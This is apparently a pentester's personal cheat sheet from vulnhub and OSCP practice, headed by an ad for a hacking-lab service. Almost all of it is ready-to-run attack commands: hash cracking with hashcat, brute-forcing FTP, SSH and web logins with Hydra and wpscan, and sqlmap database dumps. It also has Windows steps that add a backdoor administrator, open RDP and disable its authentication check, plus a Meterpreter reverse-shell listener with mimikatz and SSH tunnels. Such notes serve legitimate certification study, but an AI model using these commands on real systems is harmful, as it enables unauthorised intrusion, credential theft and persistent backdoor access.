Checkout SlayerLabs.com!
Networks Engineered to Exploit.
- Windows/UNIX - Domains/Subnets - Initial/Post/Lateral - Low Cost VPN Ranges -
Personal notes dump from testing on vulnhub machines and getting through the OSCP.
Anything explicitly from OSCP lab machines have been removed.
*************************************
Hashcat
*************************************
hashcat64.exe -m 1000 -a 0 hashess.txt rockyou.txt
hashcat64.exe -m 1000 -a 0 hashess.txt rockyou.txt --show
//hashcat on Win7
hashcat.exe -m 2500 -a 6 net.hcccap NetgearKiller.dict ?d?d?d
//to unshadow /etc/shadow hash (include $1$ in hash.txt file)
hashcat64.exe -m 500 -a 0 hashess.txt rockyou.txt
*************************************
Nmap Stuff
*************************************
//thorough nmap with all ports
nmap -sS -A -O -n -p1-60000 10.11.1.5
//solid nmap scan
nmap -v -sS -A -T5 target 192.168.56.101
//nmap ip range ring scan
nmap -sP 10.0.0.0-50
//nse script location
cd /usr/share/nmap/scripts/
nmap --script smb-vuln-cve2009-3103.nse 10.11.1.145 -p445
*************************************
*************************************
Hydra
*************************************
//hydra ftp brute force t = time/speed
hydra -t 20 -l Elly -P /root/Desktop/Documents/wordlists/john.txt -vV 192.168.56.102 ftp
hydra -t 4 -l root -P /root/password.txt 192.168.56.102 ssh
//Web Form - use burp to get action , username and password params, and login buttom with bad login phrase
hydra -L user.txt -P pass.txt 10.11.1.11 http-post-form "/blog/index.pl:User=^USER^&Password=^PASS^&Login=Login:Login failed."
*************************************
//wpscan enumerate users and plugins
wpscan -u https://192.168.56.102:12380/blogblog --enumerate uap
//wpscan brute force password
wpscan -u https://192.168.56.102:12380/blogblog --wordlist /root/Desktop/Documents/wordlists/john.txt --username Harry
//enum4linux - cut and paste usernames to list - -f2 everything with this and before - f1 after
grep 'Unix User' /home/stapusr | cut -d'\' -f2 | cut -d' ' -f1 > user_list
*************************************
*************************************
#!Bash commands
*************************************
//add single line of text to end of txt file linux
echo "word" >> file.txt
// list users in /etc/passwd
cat /etc/passwd | cut -d: -f1
//echo prepend text to file
echo -e "Omgomgogm\n$(cat test.txt)" > test.txt
//set path if issues occur on new shell
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
//show only usernames
awk -F':' '{ print $1}' /etc/passwd
*************************************
//hashcat on Win7
hashcat.exe -m 2500 -a 6 net.hcccap NetgearKiller.dict ?d?d?d
//show listening services
netstat -tul
//show linux version and kernal
lsb_release -a
uname -a
//CANNOT use on exam sqlmap
sqlmap -u 'http://target/exploitable path/' --dbs
sqlmap -u 'http://target/exploitable path/' -D dbname --tables
*************************************
Windows
*************************************
//add admin user - must have system
net user winter pass123 /add
net localgroup administrators winter /add
//open remote desktop then add user to RDP group
netsh firewall set service type = remotedesktop mode = enable
NET LOCALGROUP "Remote Desktop Users" keyoke /ADD
//excellent win priv esc guide
http://www.fuzzysecurity.com/tutorials/16.html
*************************************
*************************************
Open Remote Desktop
*************************************
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
sc config TermService start= auto
netsh firewall > add portopening TCP 3389 "Remote Desktop"
if get CredSSP add...
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
*************************************
*************************************
Meterpreter
*************************************
//set meterpreter listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
//set options, and make sure msfvenom is uploaded and run
// module to get password..maybe
load mimikatz
wdigest
//
*************************************
*************************************
Post-Exploitation
*************************************
//meterpreter post guide
https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/
//good tool to gather local exploits
post/multi/recon/local_exploit_suggester
//check shares (windows)
run post/windows/gather/enum_shares
*************************************
*************************************
Port Fwd and Tunnel
*************************************
ssh -D 127.0.0.1:9050 -f -N j0tzy@10.11.1.11 -p 22000
ssh -D 127.0.0.1:9050 -f -N sharp@10.11.1.11
*************************************
wireshark filter port
(tcp.port == 443)
//capture filter
capture filter: tcp port pop3
//gobuster cgi wordlist fuzz
gobuster -u http://192.168.72.136/cgi-bin -w cgis.txt -s '200,204,301,302,307,403,500' -e
gobuster -u http://192.168.72.138/secret -e -s '200,403,204,500' -w /usr/share/seclists/Discovery/Web_Content/Logins.fuzz.txt
//like dirb
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.11.1.11/FUZZ
*****//thorough nmap with all ports
nmap -sS -A -O -n -p1-60000 10.11.1.11
// Another solid scan
nmap -v -sS -A -T5 target 192.168.56.101